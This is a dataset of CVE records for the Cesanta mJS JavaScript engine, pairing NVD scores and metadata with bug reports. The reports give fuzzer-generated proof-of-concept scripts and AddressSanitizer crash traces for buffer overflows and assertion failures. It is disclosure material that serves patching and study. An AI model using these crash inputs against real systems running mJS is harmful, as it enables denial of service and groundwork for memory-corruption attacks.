[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/189" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/189" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/cesanta/mjs/issues/189
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.stringify + 6.54321e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064330b at pc 0x0000005b16f4 bp 0x7ffcd99733d0 sp 0x7ffcd99733c8 READ of size 8 at 0x00000064330b thread T0 #0 0x5b16f3 in mjs_mk_string /root/mjs/src/mjs_string.c:58:15 #1 0x580796 in mjs_op_json_stringify /root/mjs/src/mjs_json.c:495:13 #2 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5 #3 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11 #4 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11 #5 0x7f43da272b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9) 0x00000064330b is located 53 bytes to the left of global variable '<string literal>' defined in 'src/mjs_builtin.c:140:21' (0x643340) of size 4 '<string literal>' is ascii string 'ffi' 0x00000064330b is located 5 bytes to the right of global variable '<string literal>' defined in 'src/mjs_builtin.c:138:21' (0x643300) of size 6 '<string literal>' is ascii string 'print' SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/mjs_string.c:58:15 in mjs_mk_string Shadow bytes around the buggy address: 0x0000800c0610: f9 f9 f9 f9 00 00 00 00 00 00 00 05 f9 f9 f9 f9 0x0000800c0620: 00 06 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0000800c0630: 00 02 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x0000800c0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800c0650: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 =>0x0000800c0660: 06[f9]f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800c0670: 00 04 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 0x0000800c0680: 07 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800c0690: 03 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0000800c06a0: 04 f9 f9 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 0x0000800c06b0: 06 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==ABORTING ```
Global-buffer-overflow mjs/src/mjs_string.c:58:15 in mjs_mk_string
https://api.github.com/repos/cesanta/mjs/issues/189/comments
0
2021-12-31T05:24:24Z
2021-12-31T05:49:18Z
https://github.com/cesanta/mjs/issues/189
1,091,424,556
189
3,138
CVE-2021-46514
2022-01-27T21:15:09.677
There is an Assertion 'ppos != NULL && mjs_is_number(*ppos)' failed at src/mjs_core.c in Cesanta MJS v2.20.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/187" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/187" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/cesanta/mjs/issues/187
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (function() { ((function JSEtest(a) { if (a > 0) { if (gc(gc --gc -- !== gc(' ' !== JSEtest(a - 1)))) { JSEtest(a - 1) } } })(6)) })() ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js mjs: src/mjs_core.c:311: int mjs_getretvalpos(struct mjs *): Assertion `ppos != NULL && mjs_is_number(*ppos)' failed. [1] 32098 abort mjs poc.js ```
Assertion `ppos != NULL && mjs_is_number(*ppos)' failed at src/mjs_core.c:311: int mjs_getretvalpos(struct mjs *).
https://api.github.com/repos/cesanta/mjs/issues/187/comments
0
2021-12-31T05:22:41Z
2021-12-31T08:13:20Z
https://github.com/cesanta/mjs/issues/187
1,091,424,159
187
3,139
CVE-2021-46515
2022-01-27T21:15:09.723
There is an Assertion `mjs_stack_size(&mjs->scopes) >= scopes_len' failed at src/mjs_exec.c in Cesanta MJS v2.20.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/186" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/186" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/cesanta/mjs/issues/186
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc DOCKER_CLANG=clang $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))(((JSON.stringify - (6) * 10000) - 20 * 9060)([([JSON.parse(JSON.stringify([(0)]))])])); ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js mjs: src/mjs_exec.c:949: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) >= scopes_len' failed. [1] 118000 abort mjs poc.js ``` Credits: Found by OWL337 team.
Assertion `mjs_stack_size(&mjs->scopes) >= scopes_len' failed at src/mjs_exec.c:949: mjs_execute.
https://api.github.com/repos/cesanta/mjs/issues/186/comments
0
2021-12-31T05:21:24Z
2022-01-12T02:18:21Z
https://github.com/cesanta/mjs/issues/186
1,091,423,861
186
3,140
CVE-2021-46517
2022-01-27T21:15:09.813
There is an Assertion `mjs_stack_size(&mjs->scopes) > 0' failed at src/mjs_exec.c in Cesanta MJS v2.20.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/184" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/184" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/cesanta/mjs/issues/184
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc DOCKER_CLANG=clang $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (function() { ((function JSEtest(a) { if (a > 3) { if ([((function JSEtest(a) { if (a > 3) { if ([Object.create.apply({}, [Object])]) { Object.create.apply({}, [Object]) } } })(6))([((function JSEtest(a) { if (a > 3) { if ([Object.create.apply({}, [Object])]) { Object.create.apply({}, [Object]) } } })(6))({}, [Object])])]) { Object.create.apply({}, [Object]) } } })(6)) })() ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js mjs: src/mjs_exec.c:725: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed. [1] 111718 abort mjs poc.js ```
Assertion `mjs_stack_size(&mjs->scopes) > 0' failed src/mjs_exec.c:725: mjs_execute.
https://api.github.com/repos/cesanta/mjs/issues/184/comments
0
2021-12-31T05:19:48Z
2021-12-31T05:46:31Z
https://github.com/cesanta/mjs/issues/184
1,091,423,443
184
3,141
CVE-2021-46518
2022-01-27T21:15:09.857
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_disown at src/mjs_core.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/195" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/195" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/195
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc DOCKER_CLANG=clang $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))(((JSON.stringify - 6.24321e2) - 6.54321e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000138 at pc 0x563a2f179088 bp 0x7fff18d361c0 sp 0x7fff18d361b0 READ of size 8 at 0x604000000138 thread T0 #0 0x563a2f179087 in mjs_disown src/mjs_core.c:288 #1 0x563a2f1c7b54 in mjs_json_parse src/mjs_json.c:480 #2 0x7fff18d3630f (<unknown module>) Address 0x604000000138 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_core.c:288 in mjs_disown Shadow bytes around the buggy address: 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8010: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 =>0x0c087fff8020: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.
Heap-buffer-overflow src/mjs_core.c:288 in mjs_disown
https://api.github.com/repos/cesanta/mjs/issues/195/comments
0
2021-12-31T05:37:12Z
2022-01-12T02:18:56Z
https://github.com/cesanta/mjs/issues/195
1,091,427,107
195
3,142
CVE-2021-46519
2022-01-27T21:15:09.900
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_array_length at src/mjs_array.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/194" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/194" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/194
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (function () { ((function JSEtes(a) { if ((a - 1)) { if ((isNaN)(JSON.stringify([])) !== JSON.stringify("start_port" !== [Object.create.apply({}, [Object])])) { JSEtes(a - 1) } } })(6)) })() ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ==109503==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x607000000150 at pc 0x55d8ef005f6d bp 0x7ffe7d357b00 sp 0x7ffe7d357af0 READ of size 8 at 0x607000000150 thread T0 #0 0x55d8ef005f6c in mjs_array_length src/mjs_array.c:83 #1 0x55d8ef005f6c in mjs_array_push src/mjs_array.c:115 #2 0x55d8ef027dd8 in mjs_execute src/mjs_exec.c:679 #3 0x55d8ef034a05 in mjs_exec_internal src/mjs_exec.c:1073 #4 0x55d8ef034a05 in mjs_exec_file src/mjs_exec.c:1096 #5 0x55d8eeff1909 in main src/mjs_main.c:47 #6 0x7f6cb8331b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x55d8eeff2449 in _start (/usr/local/bin/Gmjs+0xe449) 0x607000000150 is located 0 bytes to the right of 80-byte region [0x607000000100,0x607000000150) allocated by thread T0 here: #0 0x7f6cb89e3d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55d8ef0527be in gc_new_block src/mjs_gc.c:94 #2 0x55d8ef0527be in gc_alloc_cell src/mjs_gc.c:133 #3 0x55d8ef0527be in new_object src/mjs_gc.c:45 SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_array.c:83 in mjs_array_length Shadow bytes around the buggy address: 0x0c0e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c0e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c0e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c0e7fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 fa fa fa 0x0c0e7fff8010: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa =>0x0c0e7fff8020: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa 0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ```
Heap-buffer-overflow src/mjs_array.c:83 in mjs_array_length
https://api.github.com/repos/cesanta/mjs/issues/194/comments
0
2021-12-31T05:36:16Z
2021-12-31T05:36:16Z
https://github.com/cesanta/mjs/issues/194
1,091,426,932
194
3,143
CVE-2021-46520
2022-01-27T21:15:09.947
Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_jprintf at src/mjs_util.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/193" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/193" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/193
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript gc(JSON.stringify({ translate: [ Object.create ] })) ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ================================================================= ===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b0000000ab at pc 0x55ed154d746c bp 0x7ffdfe204f10 sp 0x7ffdfe204f00 READ of size 1 at 0x60b0000000ab thread T0 #0 0x55ed154d746b in mjs_jprintf src/mjs_util.c:61 #1 0x55ed154d746b in mjs_fprintf src/mjs_util.c:93 #2 0x55ed153d5f78 in main src/mjs_main.c:51 #3 0x7fb412720b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x55ed153d7449 in _start 